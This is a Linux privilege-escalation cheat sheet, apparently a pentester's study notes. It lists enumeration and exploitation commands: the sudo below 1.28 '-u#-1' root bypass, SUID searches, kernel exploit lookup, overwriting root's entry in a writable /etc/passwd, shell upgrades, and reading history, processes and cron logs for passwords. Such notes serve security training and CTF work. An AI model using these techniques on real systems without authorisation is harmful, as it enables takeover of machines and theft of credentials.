03a. Linux Privilege Escalation

Resources

• Hacktricks Checklist
• GTFOBins
• Compiled Kernel Exploits
• [[Linux Privilege Escalation]]

Low Hanging Fruit

User with valid credentials (sudo -l):

• sudo -l to see what binaries you can run with sudo, head over to GTFOBins
• sudo -V to get version, below 1.28 can use sudo -u#-1 /bin/bash

SUID Binaries

• find / -perm -u=s -type f 2>/dev/null
• find / -perm -4000 2>/dev/null
• Head over to GTFOBins

Kernel Exploits:

• uname -a && searchsploit
• Compiled Kernel Exploits
• ~/exploits and Privilege Escalation notes

Writable /etc/passwd

• ls -la /etc/passwd to see if you have write permissions
• openssl passwd -1 -salt hacker hacker and replace root password entry (or delete x)
• su root hacker

Checklist

• Upgrade your shell if it's not fully interactive

  • python -c 'import pty;pty.spawn("/bin/bash")'

  • python -c 'import pty;pty.spawn("/bin/sh")'

  • python3 -c 'import pty;pty.spawn("/bin/bash")'

  • python3 -c 'import pty;pty.spawn("/bin/sh")'

• Get system context current user, hostname, groups

  • whoami id hostname

• Get kernel version && check for vulnerability

  • uname -a && searchsploit

• Check for sudo (valid password)

  • sudo -l sudo -V (below 1.28 sudo -u#-1 /bin/bash)

• Check for SUID Binaries

  • find / -perm -u=s -type f 2>/dev/null
  • find / -perm -4000 2>/dev/null

• Check for users && writable /etc/passwd

  • ls -la /etc/passwd cat /etc/passwd

• Check environment

  • echo $PATH (env || set) 2>/dev/null history cat ~/.bashrc

• Check processes

  • ps aux ps -ef watch -n 1 "ps -aux | grep pass"

• Check cronjobs

  • ls -lah /etc/cron* cat /var/log/syslog | grep cron cat /var/log/cron.log
  • grep "CRON" /var/log/syslog ls -la /etc/cron.d ls -la /etc/cron.hourly

• Check your writable/usable files & file permissions

  • find / -writable -type d 2>/dev/null
  • find / -perm -u=s -type f 2>/dev/null
  • ls -la

• Check networking & services running on localhost

  • ip a netstat ss -anp